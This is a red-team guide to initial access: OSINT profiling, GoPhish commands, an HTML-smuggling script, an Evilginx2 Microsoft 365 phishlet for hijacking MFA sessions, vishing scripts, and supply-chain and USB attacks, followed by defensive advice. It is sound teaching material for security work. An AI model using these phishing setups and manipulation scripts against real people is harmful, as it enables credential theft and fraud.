Initial Access & Social Engineering | Red Teaming

Initial Access Overview

Initial access is the first and often most critical phase of a red team engagement. It answers the fundamental question: how does an adversary get from the outside world into a target organization’s internal environment? Without a reliable initial foothold, even the most sophisticated post-exploitation techniques are irrelevant.

In the MITRE ATT&CK framework, initial access is catalogued under Tactic TA0001. It encompasses a range of techniques that adversaries use to gain their first foothold within a network. The techniques under TA0001 include:

T1566 — Phishing (spear phishing attachment, link, and via service)
T1189 — Drive-by Compromise
T1190 — Exploit Public-Facing Application
T1195 — Supply Chain Compromise
T1199 — Trusted Relationship
T1200 — Hardware Additions
T1078 — Valid Accounts
T1091 — Replication Through Removable Media
T1133 — External Remote Services

In real-world breaches, initial access is overwhelmingly achieved through social engineering rather than technical exploits. Verizon’s Data Breach Investigations Report consistently shows that phishing and stolen credentials account for the majority of breaches. The SolarWinds supply chain attack, the Twitter 2020 compromise (vishing helpdesk employees), the Uber 2022 breach (MFA fatigue), and the MGM Resorts 2023 incident (helpdesk social engineering) all demonstrate that human manipulation remains the most effective initial access vector.

For red teams, realistic initial access testing is essential because it validates the entire defensive stack — email security, endpoint detection, user awareness training, identity provider controls, and incident response processes. Skipping initial access and starting with “assumed breach” has its place, but it leaves a massive gap in the organization’s understanding of its actual exposure.

The techniques covered in this page form the foundation of every external red team engagement. They should be combined with robust infrastructure and followed by careful stealth and evasion once a foothold is established.

OSINT & Targeting

Effective social engineering begins long before any phishing email is sent. Open-source intelligence (OSINT) collection and target profiling determine who to target, what pretexts will be believable, and which technical vectors are most likely to succeed.

LinkedIn Harvesting

LinkedIn is the single most valuable OSINT source for red teams targeting enterprises. It provides:

Employee names, titles, and reporting structures — Allows mapping the organizational hierarchy and identifying high-value targets (executive assistants, IT helpdesk, finance, HR).
Employment history — Reveals recently hired employees who may not yet know internal processes and are more susceptible to pretexting.
Technology endorsements and certifications — Indicates what tools, platforms, and technologies the organization uses.
Group memberships — Shows professional affiliations and interests that can be leveraged in pretexts.
Connections — Maps internal relationships and identifies who communicates with whom.

Tools like linkedin2username generate likely email address formats from LinkedIn company pages. Combined with knowledge of the organization’s email format (first.last, flast, firstl), this produces a high-confidence target list without ever touching the target’s infrastructure.

Email Enumeration

Once you have candidate names, confirm email addresses and discover additional targets:

Hunter.io — Finds email patterns and known addresses for a domain. The API returns the format (e.g., {first}.{last}@company.com) and verified addresses.
TheHarvester — Aggregates email addresses from search engines, PGP key servers, and data breach databases.
Phonebook.cz — Indexes email addresses and subdomains from various sources.
Have I Been Pwned — Identifies whether target emails appear in data breaches, indicating potential credential reuse.
Dehashed / IntelX — Provide access to breach data including passwords and password hashes.

Org Chart Mapping

Understanding organizational structure helps identify:

Gatekeepers — Executive assistants who handle calendars and approve requests on behalf of leadership.
IT/Helpdesk staff — Targets for credential reset social engineering.
Finance/Accounts Payable — Targets for business email compromise (BEC) and invoice fraud.
New hires — Less familiar with internal processes and more likely to comply with unusual requests.
Contractors and third parties — Often have weaker security controls and less training.

Technology Stack Identification

Knowing the target’s technology stack shapes payload selection and pretexting:

Job postings — “Experience with CrowdStrike Falcon, Okta, and Slack required” reveals EDR, identity provider, and communication tools.
DNS records — MX records reveal email providers. SPF records list authorized senders.
Wappalyzer / BuiltWith — Identify web technologies, CDNs, and analytics tools.
Shodan / Censys — Discover internet-facing infrastructure, VPN endpoints, and exposed services.
SSL certificate transparency logs — Reveal subdomains and internal application names via crt.sh.

Beyond LinkedIn, other platforms provide operational intelligence:

Twitter/X — Employees complaining about tools, sharing conference attendance, or discussing projects.
GitHub — Developers accidentally committing credentials, internal URLs, or infrastructure details.
Instagram/Facebook — Office photos revealing badge formats, internal systems on screens, and building layouts useful for physical red teaming.
Glassdoor — Internal process descriptions and tool mentions in employee reviews.

Building Target Profiles

Combine all collected intelligence into structured profiles:

Name, title, department, reporting chain
Email address (confirmed or high-confidence guess)
Phone number (from LinkedIn, data brokers, or company directory)
Technical proficiency level — Determines payload complexity
Likely pretext angles — Based on role, interests, and current events
Risk assessment — Likelihood of reporting vs. complying

Spear Phishing

Spear phishing remains the most common initial access technique for red teams and real-world threat actors alike. Unlike mass phishing, spear phishing is targeted — the message is crafted for a specific individual or small group using intelligence gathered during OSINT.

Phishing Platforms

GoPhish is the most widely used open-source phishing framework. It provides campaign management, email sending, landing page hosting, and result tracking in a single package.

Basic GoPhish campaign setup:

# Install GoPhish
wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
unzip gophish-v0.12.1-linux-64bit.zip
cd gophish

# Edit config.json to set listener addresses
cat config.json
{
    "admin_server": {
        "listen_url": "0.0.0.0:3333",
        "use_tls": true,
        "cert_path": "gophish_admin.crt",
        "key_path": "gophish_admin.key"
    },
    "phish_server": {
        "listen_url": "0.0.0.0:443",
        "use_tls": true,
        "cert_path": "/etc/letsencrypt/live/mail.example.com/fullchain.pem",
        "key_path": "/etc/letsencrypt/live/mail.example.com/privkey.pem"
    }
}

# Launch GoPhish
sudo ./gophish

# GoPhish API — create a sending profile
curl -k -X POST https://localhost:3333/api/smtp/ \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Campaign SMTP",
    "interface_type": "SMTP",
    "host": "smtp.example.com:587",
    "from_address": "it-support@example-corp.com",
    "username": "campaigns@example.com",
    "password": "smtp_password",
    "ignore_cert_errors": false
  }'

# Create a campaign via API
curl -k -X POST https://localhost:3333/api/campaigns/ \
  -H "Authorization: Bearer YOUR_API_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Q1 Security Assessment",
    "template": {"name": "Password Expiry Notice"},
    "page": {"name": "Credential Capture"},
    "url": "https://portal.example-corp.com",
    "smtp": {"name": "Campaign SMTP"},
    "launch_date": "2026-03-25T08:00:00+00:00",
    "send_by_date": "2026-03-25T12:00:00+00:00",
    "groups": [{"name": "Finance Department"}]
  }'

King Phisher is another open-source option with more advanced features including two-factor credential harvesting, SMS phishing, and calendar invite delivery.

Payload Delivery Methods

Modern email security has rendered simple executable attachments nearly useless. Red teams must use creative payload delivery methods that bypass both email gateways and endpoint security.

Payload Type	Delivery Method	Bypass Technique	Detection Difficulty	Notes
Macro-enabled Office docs	.docm / .xlsm attachment	VBA stomping, remote template injection	Medium	Increasingly blocked by default; Mark of the Web (MOTW) applies
ISO/IMG disk images	Attachment or download link	Bypass MOTW (pre-2022 Windows)	Medium-Low	Windows 11 22H2+ now propagates MOTW into ISO contents
LNK shortcut files	Inside ZIP or ISO	Execute LOLBins (powershell, mshta, certutil)	Medium	Size anomalies detectable; command-line logging catches execution
OneNote files (.one)	Email attachment	Embedded scripts behind fake “Click to view” buttons	Medium	Microsoft now blocks embedded files in OneNote by default
HTML smuggling	HTML attachment or link	JavaScript assembles payload client-side	High	Bypasses network inspection since payload is constructed in browser
Windows shortcut + DLL	ZIP attachment	DLL side-loading via signed binary	High	Requires careful selection of vulnerable signed application
QR code phishing (quishing)	Embedded in PDF or image	Redirects to phishing site via mobile device (bypasses desktop controls)	High	Mobile devices often lack email security filtering
SVG files	Email attachment	Embedded JavaScript executes on open	Medium-High	Less commonly filtered than Office formats
Password-protected archives	ZIP with password in email body	Prevents gateway scanning of contents	Medium	Suspicious pattern; some gateways flag password-protected archives

HTML Smuggling Deep Dive

HTML smuggling is one of the most effective payload delivery techniques because it constructs the malicious file entirely in the user’s browser, bypassing all network-level inspection. The HTML file or page contains JavaScript that assembles a binary blob and triggers a download:

<!-- Simplified HTML smuggling example -->
<html>
<body>
<p>Loading document, please wait...</p>
<script>
  // Base64-encoded payload (truncated for illustration)
  var payload = "TVqQAAMAAAAEAAAA//8AALgAAAA...";

  // Decode and create blob
  var binary = atob(payload);
  var bytes = new Uint8Array(binary.length);
  for (var i = 0; i < binary.length; i++) {
    bytes[i] = binary.charCodeAt(i);
  }
  var blob = new Blob([bytes], {type: 'application/octet-stream'});

  // Trigger download
  var a = document.createElement('a');
  a.href = URL.createObjectURL(blob);
  a.download = 'Q1-Report.iso';
  document.body.appendChild(a);
  a.click();
</script>
</body>
</html>

Nobelium (the group behind SolarWinds) used HTML smuggling extensively in their campaigns. The technique is also used by threat actors distributing QakBot, IcedID, and Cobalt Strike.

Pretexting Templates

The pretext — the cover story — is what makes phishing believable. Effective pretexts align with the target’s role and current circumstances:

IT notifications: Password expiry, MFA enrollment, new VPN client, security update required
HR communications: Benefits enrollment, policy update acknowledgment, performance review scheduling
Finance: Invoice approval, expense report discrepancy, vendor payment confirmation
Executive impersonation: Urgent wire transfer, confidential project, “I need this handled quietly”
Vendor/partner communications: Contract renewal, support ticket follow-up, integration update
Current events: Tax season documents, conference registration, industry report

Sender Reputation & Email Delivery

Getting phishing emails past modern email gateways requires attention to sender infrastructure:

Domain age — Newly registered domains are flagged. Age domains for 30+ days before use.
SPF/DKIM/DMARC alignment — Configure proper SPF records for your sending domain, sign emails with DKIM, and set a DMARC policy. This is table stakes for inbox delivery.
Domain categorization — Use expired domains with existing reputation or get new domains categorized through web crawlers.
Sending warmup — Gradually increase sending volume to build IP reputation.
Email content — Avoid spam trigger words. Use proper HTML formatting. Include unsubscribe links for realism.

See Infrastructure for detailed guidance on domain setup and categorization.

Vishing (Voice Phishing)

Voice phishing — vishing — is devastatingly effective because it creates real-time pressure that email cannot. The target must make decisions on the spot, without time to consult colleagues or verify the caller’s identity. The MGM Resorts and Caesars Entertainment breaches in 2023 were both initiated through vishing attacks against IT helpdesk employees.

Pretexting for Phone Calls

Successful vishing pretexts share common characteristics:

Authority: Impersonate someone the target would not question — a senior executive, IT director, external auditor, or vendor support.
Urgency: Create time pressure — “I’m about to walk into a board meeting,” “the CEO needs this before his flight,” “our system is actively being attacked.”
Specificity: Use OSINT to reference real internal details — project names, employee names, office locations, recent events.
Plausibility: The request must make sense for the impersonated role. An IT helpdesk call asking to reset a password is normal. The same person asking for wire transfer details is not.

Common vishing scenarios for red teams:

Helpdesk password reset: “Hi, this is [employee name] from [department]. I’m traveling and locked out of my account. Can you help me reset my password?”
IT support callback: “This is [name] from IT security. We detected unusual login activity on your account. I need to verify your identity and walk you through securing your account.”
Executive assistant targeting: “This is [executive name]‘s office at [partner company]. We need to update the payment details for the upcoming contract renewal.”
Vendor impersonation: “I’m calling from [known vendor] support. We’re seeing an issue with your license server and need remote access to diagnose it.”

AI Voice Cloning

AI voice cloning represents a significant emerging threat to vishing defenses. With as little as 3-15 seconds of audio (easily obtained from conference talks, YouTube videos, podcasts, or earnings calls), modern voice synthesis tools can generate convincing real-time voice clones.

This has already been exploited in the wild — a 2024 incident saw an employee tricked into authorizing a $25 million transfer after a deepfake video call impersonating the company’s CFO.

Red teams should be aware of this capability when developing attack scenarios, though the use of AI voice cloning in engagements raises ethical and legal questions that must be addressed in the rules of engagement.

MFA Fatigue via Vishing

A powerful combination technique: call the target while simultaneously triggering MFA push notifications:

Obtain valid credentials (from OSINT, password spraying, or breach data)
Call the target impersonating IT support: “We’re performing a security migration and you’ll receive an MFA prompt — please approve it to complete the process.”
Trigger the authentication attempt, generating the push notification
The target, primed by the phone call, approves the prompt

This combines the real-time pressure of vishing with the technical exploitation of MFA push mechanisms. It was a key factor in the Uber 2022 breach.

Tools and Considerations

Spoofed caller ID — Services can display any caller ID number. Spoof the organization’s own IT helpdesk number for maximum credibility.
Call recording — Always check legal requirements. Many jurisdictions require one-party or two-party consent. Document this in the rules of engagement.
Call scripts — Prepare scripts but practice natural delivery. Reading from a script sounds robotic and raises suspicion.
Callback numbers — Set up a voicemail box on your spoofed number in case the target wants to call back and verify.

MFA Bypass Techniques

Multi-factor authentication is a critical defensive control, but it is not impenetrable. Red teams regularly bypass MFA using several well-documented techniques.

Evilginx2 — Reverse Proxy Phishing

Evilginx2 is the most important tool in the modern phishing arsenal. It acts as a transparent reverse proxy between the victim and the legitimate authentication provider, capturing not just credentials but the authenticated session token — completely bypassing MFA regardless of the MFA method used.

sequenceDiagram
    participant V as Victim
    participant E as Evilginx2 Proxy
    participant R as Real Login Page

    V->>E: Visits phishing URL (login.example-corp.com)
    E->>R: Proxies request to real login page
    R-->>E: Returns real login page
    E-->>V: Serves login page (looks identical)
    V->>E: Enters username + password
    E->>R: Forwards credentials to real site
    R-->>E: Requests MFA
    E-->>V: Proxies MFA prompt to victim
    V->>E: Completes MFA (push approve, TOTP code, etc.)
    E->>R: Forwards MFA response
    R-->>E: Returns authenticated session cookie
    E-->>V: Redirects to real site (victim sees normal login)
    Note over E: Evilginx captures session cookie
    Note over E: Attacker imports cookie into browser
    Note over E: Full access without needing MFA again

Evilginx2 phishlet configuration example for a Microsoft 365 target:

# Example Evilginx2 phishlet for Microsoft 365 (simplified)
name: 'o365'
author: '@kgretzky'

proxy_hosts:
  - phish_sub: 'login'
    orig_sub: 'login'
    domain: 'microsoftonline.com'
    session: true
    is_landing: true
  - phish_sub: 'www'
    orig_sub: 'www'
    domain: 'office.com'
    session: false

sub_filters:
  - triggers_on: 'login.microsoftonline.com'
    orig_sub: 'login'
    domain: 'microsoftonline.com'
    search: 'login.microsoftonline.com'
    replace: 'login.{hostname}'
    mimes: ['text/html', 'application/json', 'application/javascript']

auth_tokens:
  - domain: 'login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
  - domain: '.microsoftonline.com'
    keys: ['SignInStateCookie']

credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'

login:
  domain: 'login.microsoftonline.com'
  path: '/common/oauth2/authorize?client_id=...'

# Evilginx2 usage
./evilginx2

# Configure domain and IP
config domain example-corp.com
config ipv4 203.0.113.50

# Set up phishlet
phishlets hostname o365 login.example-corp.com
phishlets enable o365

# Create lure (phishing URL)
lures create o365
lures edit 0 redirect_url https://office.com
lures get-url 0
# Output: https://login.example-corp.com/aBcDeFgH

Modlishka

Modlishka is another reverse proxy phishing tool with a different architecture than Evilginx2. It proxies all traffic dynamically without requiring phishlet configurations, making it faster to deploy against new targets but potentially less reliable for complex authentication flows.

EvilnoVNC — Real Browser in the Middle

EvilnoVNC takes a different approach entirely. Instead of proxying HTTP traffic, it runs a real browser on the attacker’s server and streams it to the victim via noVNC (browser-based VNC). The victim interacts with what appears to be a normal login page, but they are actually controlling a remote browser session.

Advantages over traditional reverse proxy:

Works against all authentication methods including FIDO2/WebAuthn (since the real browser is on the attacker’s server)
No TLS certificate mismatches or content rewriting issues
JavaScript-heavy sites work perfectly since a real browser renders them
Can capture any browser-based session, not just login flows

Disadvantages:

Higher latency (noticeable to observant users)
Requires more server resources (running headless browsers)
Limited scalability compared to reverse proxy approaches

MFA Fatigue / Push Bombing

MFA fatigue exploits push-based MFA (Microsoft Authenticator, Duo, Okta Verify) by repeatedly triggering authentication prompts until the user approves one out of frustration, confusion, or the belief that something is broken.

Attack process:

Obtain valid username and password (credential stuffing, breach data, password spraying)
Repeatedly attempt authentication, generating push notifications on the target’s device
Optionally combine with vishing — call the target claiming to be IT support
Target eventually approves a push notification

Mitigations: Number matching (user must type the number displayed on screen), additional context in push notifications (location, application), rate limiting on push notifications.

SIM Swapping

SIM swapping targets SMS-based MFA by convincing a mobile carrier to transfer the target’s phone number to a SIM controlled by the attacker. Once successful, all SMS messages (including MFA codes) are redirected to the attacker.

This technique is increasingly used by threat groups like Scattered Spider (responsible for the MGM and Caesars breaches). It requires social engineering the carrier’s customer support or having an insider at the carrier.

FIDO2/WebAuthn Limitations

FIDO2/WebAuthn hardware keys and passkeys are resistant to reverse proxy phishing because authentication is bound to the legitimate domain. If the user is on login.evil.com instead of login.microsoft.com, the authenticator will not respond.

However, FIDO2 is not immune to all attacks:

EvilnoVNC bypasses domain binding because the real browser is on a server accessing the legitimate domain
Device compromise — If the endpoint is already compromised, session tokens can be stolen post-authentication
Social engineering — Users can be tricked into registering attacker-controlled security keys
Implementation flaws — Fallback mechanisms (SMS, email codes) may still be available if the FIDO2 key is “lost”

Watering Hole Attacks

Watering hole attacks compromise websites that the target organization’s employees are known to visit. Instead of sending a phishing email to the target, the attacker brings the exploit to a site the target already trusts.

Identifying Target Websites

Effective watering hole targeting requires understanding the target’s browsing habits:

Industry-specific forums and news sites — Niche industry publications that employees in the target sector regularly visit
Professional association websites — Conference pages, member portals, certification bodies
Regional news sites — Local news outlets near the target’s office locations
Supply chain partner portals — Vendor documentation sites, partner portals, integration documentation
Internal tool documentation — Third-party documentation sites for tools the organization uses

Attack Mechanics

Compromise the watering hole site — Exploit vulnerabilities in the website’s CMS, plugins, or hosting infrastructure
Inject selective exploit code — Only serve the exploit to visitors from the target’s IP range or matching specific fingerprints
Deliver payload — Browser exploit chain, drive-by download, or credential harvesting via fake authentication prompt
Clean up — Remove exploit code after the target is compromised to reduce detection window

Watering hole attacks are primarily associated with nation-state actors (APT groups) due to the sophistication required. Notable examples include APT1’s targeting of industry forums and multiple campaigns against defense contractor communities.

Drive-by Downloads

Modern browsers have significantly reduced the attack surface for drive-by exploits, but they still exist:

Browser zero-days — Rare and expensive, but used by nation-state actors
Plugin exploits — Targeting remaining browser plugins (increasingly rare with Flash’s death)
Fake update prompts — “Your browser is out of date, click to update” delivering malware (SocGholish/FakeUpdates is a prominent example)
Malvertising — Injecting malicious ads into legitimate ad networks

Supply Chain Attacks

Supply chain attacks compromise the target indirectly by attacking a trusted third party — a software vendor, service provider, or development dependency. These attacks are particularly dangerous because they exploit existing trust relationships.

Dependency Confusion

Dependency confusion exploits how package managers resolve dependencies. If an internal package name is also registered on a public registry, the package manager may pull the public (malicious) version:

Identify internal package names (from GitHub repos, job postings, error messages, or leaked configuration files)
Register the same name on public registries (npm, PyPI, RubyGems)
Publish a version with a higher version number containing a malicious install script
Wait for build systems to pull the malicious public package instead of the internal one

This technique was famously demonstrated by Alex Birsan in 2021, who successfully compromised Apple, Microsoft, PayPal, and other major companies.

Typosquatting

reqeusts instead of requests (PyPI)
lodsah instead of lodash (npm)
python-dateutils instead of python-dateutil

When developers make typos during pip install or npm install, they pull the malicious package. Effective typosquats target packages that are frequently typed manually (as opposed to copied from documentation).

Compromised Build Pipelines

Targeting CI/CD pipelines provides access to the build process itself:

Compromised GitHub Actions / GitLab CI runners — Inject malicious steps into build workflows
Poisoned base images — Compromise Docker base images used in builds
Build system credentials — Steal signing keys, deployment credentials, or API tokens from build environments
Code repository compromise — Directly modify source code in repositories (as in the SolarWinds attack, where malicious code was injected into the Orion build process)

Trusted Relationship Abuse

Organizations grant network access, API credentials, or VPN connectivity to trusted partners and vendors. Compromising the less-secure partner provides a path into the more-secure target:

Managed service providers (MSPs) — Compromising an MSP grants access to all their clients (as demonstrated by multiple REvil ransomware campaigns)
IT vendors with remote access — HVAC, security camera, and other IoT vendors often have persistent network access
Shared SaaS platforms — Compromising shared collaboration spaces or file sharing

Physical Initial Access

Physical access techniques bypass all network-level security controls. When a red team can place a device on the internal network or get a user to plug in a malicious USB device, they have bypassed the firewall, email gateway, and web proxy entirely.

See Physical Red Teaming for comprehensive coverage of physical security assessment.

USB-Based Attacks

USB Rubber Ducky — A keystroke injection tool that appears as a keyboard to the operating system. It types pre-programmed payloads at superhuman speed (up to 1000 words per minute). Used in USB drop attacks where devices are left in parking lots, lobbies, or mailed to targets.
Bash Bunny — A more advanced platform that can emulate multiple USB devices simultaneously (keyboard, storage, ethernet adapter). Supports complex multi-stage payloads with conditional logic.
O.MG Cable — A USB cable with an embedded Wi-Fi-enabled implant. Indistinguishable from a normal charging cable. Can inject keystrokes, exfiltrate data, and be controlled remotely via Wi-Fi. Devastating in supply chain scenarios where cables are distributed as swag or left in conference rooms.
BadUSB — Reprogrammed USB device firmware to behave as a keyboard or network adapter. Any USB device can potentially be converted into an attack tool.

Rogue Network Devices

LAN Turtle — A covert network implant disguised as a USB Ethernet adapter. Provides persistent remote access to the internal network via reverse SSH tunnels, can perform man-in-the-middle attacks, and exfiltrate data.
WiFi Pineapple — A rogue wireless access point that can impersonate legitimate corporate SSIDs, intercept wireless traffic, and capture credentials via evil twin attacks.
Packet Squirrel — An inline network implant for packet capture and man-in-the-middle attacks. Connected between a network device and its ethernet port, it passively captures traffic.
Raspberry Pi implants — Custom-built implants using Raspberry Pi hardware with cellular connectivity for out-of-band command and control.

Badge Cloning

Physical facility access often requires cloning RFID/NFC access badges:

Proxmark3 — The standard tool for reading, cloning, and emulating RFID/NFC cards. Supports HID iCLASS, MIFARE, EM4100, and many other formats.
Long-range readers — Can read badges from several feet away, enabling covert cloning in elevators, cafeterias, or while walking past a target.
Badge format identification — Visual identification of card type (HID, AWID, etc.) based on card appearance and reader type installed at the facility.

Multi-Channel Campaigns

The most sophisticated social engineering campaigns use multiple communication channels in coordinated sequences. Single-vector attacks (email only, phone only) are increasingly caught by awareness training. Multi-channel campaigns build credibility by creating a consistent narrative across touchpoints.

flowchart TD
    A[OSINT & Target Selection] --> B[LinkedIn Connection Request]
    B --> C[Build Rapport via LinkedIn Messages]
    C --> D[Move Conversation to Email]
    D --> E{Choose Escalation Path}

    E -->|Path 1: Technical| F[Send Document with Payload]
    E -->|Path 2: Credential| G[Send Link to Fake Portal]
    E -->|Path 3: Vishing| H[Schedule Phone Call]

    F --> I[Payload Execution → Initial Access]
    G --> J[Credential Capture → MFA Bypass]
    H --> K[Social Engineer Helpdesk → Account Takeover]

    J --> L[Evilginx2 Session Hijack]
    K --> M[Password Reset + MFA Fatigue]

    I --> N[Establish C2 Channel]
    L --> N
    M --> N

    N --> O[Proceed to Post-Exploitation]

    style A fill:#1a1a2e,stroke:#e94560,color:#eee
    style N fill:#1a1a2e,stroke:#e94560,color:#eee
    style O fill:#0f3460,stroke:#e94560,color:#eee

Campaign Architecture

Phase 1 — Reconnaissance (1-2 weeks)

Complete OSINT collection
Identify 10-20 primary targets and 5-10 secondary targets
Map organizational relationships between targets
Identify pretexting angles for each target

Phase 2 — Rapport Building (1-2 weeks)

Connect with targets on LinkedIn using a credible cover identity
Engage in industry discussions and share relevant content
Establish credibility through professional interactions
Move selected conversations to email for “more detailed discussion”

Phase 3 — Delivery (days)

Send the phishing payload or credential harvesting link
Time delivery to align with the pretext (beginning of quarter for “financial reports,” Monday morning for “weekly updates”)
Have vishing backup ready if email does not produce results within 48 hours

Phase 4 — Exploitation (hours)

Execute credential capture or payload delivery
Bypass MFA using captured session tokens or push fatigue
Establish initial C2 communication
Transition to stealth and evasion techniques

Progressive Trust Escalation

Effective multi-channel attacks gradually increase the ask:

Low commitment: Accept LinkedIn connection, reply to a benign email
Medium commitment: Share a document, visit a link, provide a phone number
High commitment: Enter credentials, approve an MFA prompt, install software, transfer funds

Each successful interaction increases trust and makes the next, more invasive request seem natural. This mirrors real-world techniques used by intelligence services and advanced persistent threat groups.

Psychological Triggers

Social engineering exploits predictable cognitive biases. Understanding these triggers allows red teams to craft more effective campaigns and helps defenders build more resilient training programs.

The Six Principles of Influence

Based on Robert Cialdini’s research and adapted for cybersecurity:

Authority — People comply with requests from perceived authority figures. In social engineering:

Impersonating executives, IT administrators, or auditors
Using official-sounding language, logos, and email signatures
Referencing organizational policies or regulatory requirements
“This request comes directly from the CISO’s office”

Urgency/Scarcity — Time pressure short-circuits critical thinking:

“Your account will be locked in 2 hours if you don’t verify”
“This wire transfer must be completed before end of business”
“We’re under active attack and need your help right now”
Limited-time offers: “Only the first 50 employees get the new laptop”

Reciprocity — People feel obligated to return favors:

Providing a “free” industry report before asking the target to “verify their login”
Helping with a small IT issue before requesting access or information
Sending useful information or tools before the phishing payload

Social Proof — People follow what others are doing:

“Your colleagues in the finance department have already completed this verification”
Showing fake completion statistics: “87% of employees have updated their credentials”
Referencing specific colleagues by name who have “already complied”

Fear — Threats of negative consequences drive action:

“Failure to complete this security update will result in loss of VPN access”
“Your account has been compromised — immediate action required”
“HR has flagged a compliance issue with your records”

Curiosity — Humans are naturally curious:

“Salary data for Q2 has been accidentally shared — see attached”
“Photos from the company holiday party”
“Your name appeared in this internal audit report”

Applying Triggers in Campaigns

The most effective social engineering attacks combine multiple triggers. A phishing email from the “IT Security Director” (authority) about a “critical vulnerability discovered this morning” (urgency + fear) with a note that “the executive team has already completed the patch process” (social proof) and a deadline of end of business (scarcity) hits four triggers simultaneously.

Initial Access Technique Comparison

Technique	Avg. Success Rate	Detection Difficulty	Cost	Skill Required	MITRE Technique
Spear phishing (payload)	10-30% click rate	Medium	Low	Medium	T1566.001
Spear phishing (credential harvest)	15-40% submission rate	Medium-High	Low	Medium	T1566.002
Vishing (helpdesk)	30-60%	High	Low	High (social skills)	T1566.004
MFA fatigue (push bombing)	10-25%	Medium	Low	Low	T1621
Evilginx2 (session hijack)	20-35%	High	Medium	High	T1557
Watering hole	Variable	Very High	High	Very High	T1189
Supply chain (dependency confusion)	Variable	Very High	Medium	High	T1195.001
USB drop	15-45% pickup/plug rate	Medium	Medium	Low	T1091
Physical implant (LAN Turtle)	N/A (requires access)	High	Medium	Medium	T1200
SIM swapping	50-80% (carrier dependent)	High	Medium	Medium	T1111

Success rates are approximations based on published red team reports and research. Actual rates vary significantly based on target organization maturity, pretext quality, and defensive controls in place.

Defensive Considerations

Red teams have a responsibility to help organizations improve their defenses, not just demonstrate attacks. Understanding what makes security awareness and technical controls effective is essential for delivering actionable recommendations.

What Makes Phishing Training Effective

Most phishing awareness programs fail because they rely on annual compliance training that employees forget within weeks. Effective programs share these characteristics:

Continuous simulation — Regular phishing simulations (monthly or more) keep awareness high. One-time tests produce temporary spikes in awareness that quickly decay.
Progressive difficulty — Start with obvious phishing and gradually increase sophistication. Jumping straight to targeted spear phishing creates frustration and learned helplessness.
Immediate feedback — When a user clicks a simulated phish, show them immediately what they missed. Delayed training reports are far less effective than real-time teachable moments.
Positive reinforcement — Recognize and reward employees who report phishing emails. Punishing those who click creates a culture of shame and discourages reporting of real incidents.
Role-based training — Finance, HR, and executive assistants face different threats than engineers. Tailor scenarios to the threats each group actually encounters.
Realistic pretexts — Simulations should reflect actual threat actor techniques, not obviously fake “You’ve won a prize!” emails that nobody falls for.

Security Awareness Metrics

Track meaningful metrics rather than vanity numbers:

Click rate over time — Should trend downward. If it plateaus, increase pretext sophistication.
Report rate — The percentage of recipients who report the email to security. This is arguably more important than click rate because it measures whether the organization’s reporting culture is working.
Time to report — How quickly are phishing emails reported? Faster reporting enables faster response.
Repeat clickers — Identify individuals who consistently fail simulations for targeted additional training.
Dwell time — For simulated credential harvesting, how many users submitted credentials vs. those who clicked but did not submit?

Building a Reporting Culture

The single most impactful defensive measure against social engineering is making it easy and safe to report suspicious communications:

One-click reporting — A “Report Phish” button in the email client that automatically forwards the email to the security team.
No punishment for false positives — If employees are punished for reporting legitimate emails as phishing, they will stop reporting entirely.
Feedback loops — Tell employees what happened with their reports. “Thank you for reporting — this was a simulated phish and you helped protect the company” or “This was a real phishing attempt and your report helped us block it for the entire organization.”
Executive participation — When leadership publicly participates in security awareness and shares their own near-miss stories, it normalizes security-conscious behavior.

Technical Controls Layered Defense

Even the best awareness training will not catch everything. Technical controls must provide defense in depth:

Email gateway filtering — Microsoft Defender for Office 365, Proofpoint, Mimecast — with URL rewriting, sandbox detonation, and attachment analysis
DMARC enforcement — Reject or quarantine emails that fail SPF/DKIM alignment to prevent domain spoofing
Conditional access policies — Restrict authentication to managed devices, known locations, and compliant endpoints
Phishing-resistant MFA — FIDO2/WebAuthn hardware keys eliminate the entire class of MFA bypass attacks that rely on capturing TOTP codes or push approvals
Browser isolation — Render web content in isolated containers to prevent drive-by exploits and credential theft from phishing sites
DNS filtering — Block known malicious domains and newly registered domains at the DNS level

Summary

Initial access and social engineering represent the most human-dependent phase of red team operations. The techniques described here — spear phishing, vishing, MFA bypass, watering holes, supply chain attacks, physical access, and multi-channel campaigns — form a comprehensive toolkit for gaining that critical first foothold.

Key takeaways:

OSINT quality determines campaign success — Invest the time in thorough reconnaissance before sending a single email or making a single call
Technical and human vectors are complementary — The most effective attacks combine technical exploitation (Evilginx2, HTML smuggling) with psychological manipulation (pretexting, authority, urgency)
MFA is not a silver bullet — Reverse proxy phishing, push fatigue, SIM swapping, and EvilnoVNC all bypass common MFA implementations. Only FIDO2/WebAuthn provides strong resistance, and even that can be circumvented by real-browser-in-the-middle attacks
Multi-channel campaigns succeed where single-vector attacks fail — Coordinating across email, phone, SMS, and social media creates a narrative that is difficult to distinguish from legitimate business communication
Defensive recommendations must accompany offensive findings — Red teams that demonstrate initial access without providing actionable defensive guidance are only doing half the job

The initial access phase transitions directly into establishing persistent access and moving laterally through the target environment. See Stealth & Evasion for maintaining access without detection once the foothold is established.